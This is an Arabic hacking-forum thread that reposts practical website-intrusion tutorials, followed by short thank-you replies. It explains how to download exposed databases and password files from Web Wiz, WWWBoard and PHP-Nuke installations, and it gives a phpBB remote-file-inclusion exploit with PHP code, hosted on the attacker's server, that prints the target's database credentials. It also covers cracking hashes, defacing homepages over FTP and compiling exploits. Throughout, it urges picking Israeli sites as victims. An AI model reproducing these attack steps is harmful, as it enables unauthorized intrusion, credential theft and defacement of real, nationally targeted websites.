السلام عليكم الموضوع منقول بس حبيت أعرضه عليكم وإنشاله تستفيدون ================== السلام عليكم أرجوا عدم استخدام الموضوع فيما حرمه الله وأنا أبرئ ذمتي من كل استخدام محرم ألا هل بلغت اللهم اشهد !! ثغرة حلوة جدا جدا ومثلها مثل الباقي رح الى [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] واكتب web wiz weekly poll واختر الي يستاهل ولتكون اسرائيلية اكتب مثلا web wiz weekly poll co.il مثلا [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] نضيف weekly_poll.mdb [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] بتتحمل قاعدة البيانات وطلع الاسم والرقم بعدين واتجه ال admin.htm [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] ضع الاسم والرقم وتمتع بالخير ============== ثغره Web Wiz forum وامتدادها تكون . . . admin/wwforum.mdb [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] تصبح . . . [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] طريقه البحث عن الثغره . . . . [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] وتبحث عن Web Wiz forum وشكرا سهله جدا ============== ثغره مجله النيوك الاصدار الخامس وتحت وبعض الي فوق اولا شغل الرابط التالي مع مراعات تغير اسم الموقه: Exploit: [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] بعدها قم بالدخول الى الرابط الذي صنعته بواسطة الخطة السابقه: لاحظ انك نسخت ملف الكونفيق ولصقته في مجلد الصور [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] =-=-=--=-=-=-=-=-=-=-= الاصدار الخامس وبعض الاصدارات الاخرى الوصف: الثغره في ملف viewpage.php هذي الثغره تسمح لك برئيه ملفات مهمه التطبيق : تطبق الثغره عن طريق المتصفح [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] =-=-=--=-=-=-=-=-=-=-= ثغره مجله النيوك) هذه ثغره مجله النيوك لكن يجب ان يكون المنتدى مشغل وشكرا [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] NTO%20OUTFILE%20'[/path]/vf.txt'/* لا تستخدمونها على المسلمين =.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.= شرح ثغرة WWWBoard المعروفة لنفترض أن الموقع المراد إختراقه هو [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] لنضف إليه هذي الجملة wwwboard/passwd.txt فيصبح العنوان [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] نفتح العنوان سوف تجد cknouse:aexMVWnDOyrdE كلمة المرور+ إسم المستخدم يعني إسم المستخدم هو cknouse وكلمة المرور هي aexMVWnDOyrdE ملاحظة:بعض المواقع مقفلة هذي الثغرة(يعني اذا ما جاك زي اللي فوق دور على موقع ثاني) فك تشفيرالباسوورد بواسطة برنامج John The Ripper (الشرح موجود في المنتدى) الحين عندك إسم المستخدم وكلمة المرور وش تسوي عشان تغير الصفحة الرئيسية روح للاف تي بي حق الموقع يعني اكتب في المتصفح [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] ملاحظة إستبدل domen.com بإسم الموقع إلي عندك باسوورده وحط اليوزر نيم والباسوورد وإدخل على الموقع أنشئ صفحة بإسم index.html وإرفعها للموقع طيب الحين انا بسهل لك عملية البحث على مواقع فيها هذي الثغرة: ادخل الى اي من مواقع البحث وتفضل ان تكون اسرائيلية عشان النتائج تكون مواقع اسرائيلية وهذا محرك بحث اسرائيلي [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] واكتب في خانة البحث wwwboard/passwd.txt او wwwboard راح تتطلعلك مواقع تحتوي على هذه الثغرة اختر اي واحدة منهم واخترقه =.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.==.= ثغرة خطيرة في هاك الرد السريع مهم code: -------------------------------------------------------------------------------- if ( $mode == 'smilies' ) { define('IN_PHPBB', true); include($phpbb_root_path . 'extension.inc'); include($phpbb_root_path . 'common.'.$phpEx); include($phpbb_root_path . 'includes/functions_post.'.$phpEx); generate_smilies('window', PAGE_POSTING); exit; } -------------------------------------------------------------------------------- دقق جيدا بهذا الكود ثم أنشاء ملف جديد سمه extension.inc وضع داخلها مثلا شفرة code: -------------------------------------------------------------------------------- <?php include('config'.'.php'); echo "DB Type: $dbms <br>"; echo "DB Host: $dbhost <br>"; echo "DB Name: $dbname <br>"; echo "DB User: $dbuser <br>"; echo "DB Pass: $dbpasswd <br>"; exit; ?> -------------------------------------------------------------------------------- يمكنك وضع الخيارات التي تود مشاهدتها من الهاك الآن وبكل سهولة بعد تنزيل extension.inc الى موقع يدعم البي اتش بي أتجه الى هذا العنوان URL: [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] Server]/&mode=smiles بسهولة أستبدل [phpBB_Forum] بعنوان المنتدى المستهدف [Your Server] بعنوان الموقع الذي قمت بوضع الملف اللذي أنشائناه به ماذا ترى؟؟؟ معلومات قاعدة البيانات بين ايديك خطيرة الثغرة هذا اذا كان الهاكات فيهن ثغرات اجل وشولون المنتدى الحل لهذه الثغرة الخطيرة والتي شردت الكثير من المنتديات : ببساطة أفتح الملف quick_reply.php أبحث عن if ( $mode == 'smilies' ) أَضف بعدها مباشرة phpbb_root_path = "./"; وانشاءالله انحلت المشكلة _____________+_____________ معلومه إضافيه معظم هذه المعلومات أنامو فاهمها بس حطيتها قلت يمكن تفهمونها وتستفيدون >>>>>>>>>>>>>>>>>>>>>>بعد أن حصلت على المعلومات عن الموقع عليك البحث لما يمكن أن تجد له ثغرات في المواقع الموجودة بالأسفل هنا وستتعلم الآن ما يأتي : هذا الملف يحتوي على : - ماهي ا&##1604;ثغرات: [ تعريف لها + أسماؤها باللغة الإنجليزية + بعض المصطلحات + ..... ] - أنواع &##1575;لثغرات. [ ثغرات المتصفح + الاستثمارات أو الاكسبلويتس] - كيفية &##1575;ستثمار الثغرات. [ استثمار ثغرات اليونيكود والمتصفح - استثمار الاستثمارات في ويندوز - في لينيكس ] - أشياء &##1605;تفرقة. -------------------------------------------------------------------------------------------------- بسم الله الرحمن الرحيم : 1- ماهي الثغرات ؟ الثغرات هي أخطاء برمجية في برامج معينة مثل سيرفرات المواقع وأي برامج اخرى ، لأنها من صنع البشر لذا يجب أن تحتوي على أخطاء أو ( ثغرات) وهناك أنواع أخرى عبارة عن برامج مصممة ومكتوبة بلغات معينة لاستغلال ثغرة معينة. ويطلق عليها أسماء كثير مثل : Exploits - Bugs - holes - security holes - vulnerabilities 2- أنواع الثغرات : أولا : ثغرات المتصفح : هي ثغرات يتم استغلالها من المتصفح وتلحق باسم الموقع ولها أنواع مثل اليونيكود وثغرات السي جي آي CGI bugs وبعضها يمكن استخدامها مباشرة من المتصفح مثل اليونيكود وبعض ثغرات السي جي آي . ولكن بعض أو أكثر ثغرات المتصفح يتم التأكد فقط من وجودها من خلال المتصفح. الثغرات التي يمكن استغلالها من المتصفح مباشرة مثل: /cgi-bin/passwd.txt إذا كان الموقع هو [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] فتكتب الثغرة هكذا في المتفح [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] هذه الثغرة تعرض لك أسماء المستخدمين وكلمات المرور للمستخدمين للموقع مثل المدير وكل من يسمح له بدخول قاعدة بيانات الموقع طبعا لا تحاول تجربة هذه الثغرة الآن ...إلا إذا كنت تريد اختراق موقع في زيمبابوي نسيه أصحابه من 10 سنين (حتى هذه الثغرة يمكن ألا تصلح معهم ) أما الثغرات الأخرى الخاصة بالمتصفح فيمكنك التأكد من وجودها فقط من خلال المتصفح ثم الحصول على استثمار لها الاستثمار Exploit : هو برنامج صغير يكتب بلغة برمجة معينة ويمكن الاستفادة منه في استغلال ثغرة معينة موجودة بالموقع وتكتب ببعض لغات البرمج مثل - لغة سي C -لغة بي?ل Perl - لغة ال&##1594;لاف أو شل shell ويمكن استثمار هذه الثغرات من الويندوز لكن يجب توفر بعض البرامج أما من اللينيكس فهو أفضل ولا يجب توفر أي برامج.. - كيفية &##1575;ستغلال الثغرات : 1- ثغرات المتصفح تم ذكرها بالأعلى وهذه بعض المواضيع الممتازة عن ثغرات اليونيكود والمتصفح : شرح عن اليونيكود شرح آخر عن اليونيكود شرح آخر وشرح آخر أيضًا شرح عن ثغرات السي جي آي شرح آخر باللغة الإنجليزية ثانيا : الاكسبلويتس أو الاستثمارات Exploits الاستثمارات أو الاكسبلويتات Exploits وهي كما قلنا برامج تكتب بلغات برمجة معينة لاستغلال ثغرة في الموقع إما في سيرفر الموقع أو في نظام التشغيل أو في بعض البرامج الموجودة على الموقع مثل المنتديات وأي برامج موجودة على الموقع مثل قوائم الاستفتاء أو سجل الزوار أو حتى عداد الزوار باختصار كل سكربتات بيرل وسي جي آي. ( راجع الدرس الأول ) عندما تجمع المعلومات عن الموقع كما في الدرس الأول مثل معرفة نوع سيرفر الموقع أو برنامج الإف تي بي الذي يستخدمه الموقع مثلا إن علمت أن سيرفر الموقع هو IIS4 فعليك الذهاب إلى أحد مواقع الهكرز المكتوبة بالأسفل والبحث عن ثغرة أو استثمار لها وابحث عن IIS 4 وبعد أن تحصل على الاكسبلويت عليك إستثماره : أولاً : الاستثمارات في ويندوز : - إذا كا&##1606; الاكسبلويت مكتوبًا بلغة بيرل تستطيع ترجمتها أو عمل Compiling لها عن طريق برنامج Active Perl من شركة Active state [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] عن طرق الأمر التالي في الدوس perl exploit.pl ثم تظهر طريقة الاستعمال التي يجب أن تتبعها. الوصول للدوس من هنا start==>run ثم اكتب command إبدأ==>تشغيل==>command - ام الا&##1603;سبلويتات المكتوبة بلغة سي فيلزمك برنامج لترجمتها يسمى Borland C ++ Compiler حاول أن تجده بنفسك. - أماال?كتوبة بلغة شل فلا يوجد طريقة لاستغلالها في ويندوز على حد علمي. ثانيًا : الاستثمارات في لينيكس : لينيكس نظام التشغيل الشهير هو نظام رائع جدا ومع أنه تتوفر فيه كل البرامج التي تساعد الهاكر إلا أنه ليس للهاكرز فقط وتكمن قوته في سطرالأوامر إذا أردت ترجمة ثغر ة مكتوبة بلغة سي C أولا يجب عليك تحويلها إلى برنامج تنفيذي عن طريق الأمر gcc exploit.c -o exploit ثم تشغيل الملف وقراءة التعليمات أما إن كام مكتوبا بلغة بيرل فقط اكتب اسم الملف وستظهر لك طريقة التشغيل والباقي عليك.. ----------------- مواقع أمن رائعة يمكنك البحث فيها عن ثغرات ومواقع هكرز عربية وأجنبية وأنصجك بشدة بالتسجيل في قوائمهم البريدية حيث يمدونك بأحدث الثغرات أولاً باول ويوميا نصيحة : استخدم بريدًا وهميا بمعلومات وهمية وأسماء وهمية [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] hashash.org/vb [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] ===> مغلق ولا أعلم إن كان سيعود [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] ===> خاص لثغرات السي جي آي وبيرل إن وجدت على الموقع إبحث عنها here
3 مشترك
ماهى ثغرات المواقع وكيفية التعرف عليها والعمل معها
A-Ghazaleh- Admin
- عدد المساهمات : 96
السٌّمعَة : 24
تاريخ التسجيل : 07/10/2010
- مساهمة رقم 1
ماهى ثغرات المواقع وكيفية التعرف عليها والعمل معها
من طرف A-Ghazaleh الإثنين نوفمبر 08, 2010 7:46 am
braga- عدد المساهمات : 2
السٌّمعَة : 0
تاريخ التسجيل : 16/03/2013
- مساهمة رقم 2
رد: ماهى ثغرات المواقع وكيفية التعرف عليها والعمل معها
من طرف braga السبت مارس 16, 2013 2:40 pm
والله شرح احسن من شرح الأستا> شكرا اخي
ranma- عدد المساهمات : 1
السٌّمعَة : 0
تاريخ التسجيل : 15/02/2014
- مساهمة رقم 3
رد: ماهى ثغرات المواقع وكيفية التعرف عليها والعمل معها
من طرف ranma السبت فبراير 15, 2014 4:18 pm
merciiiiiiiiiiiiiii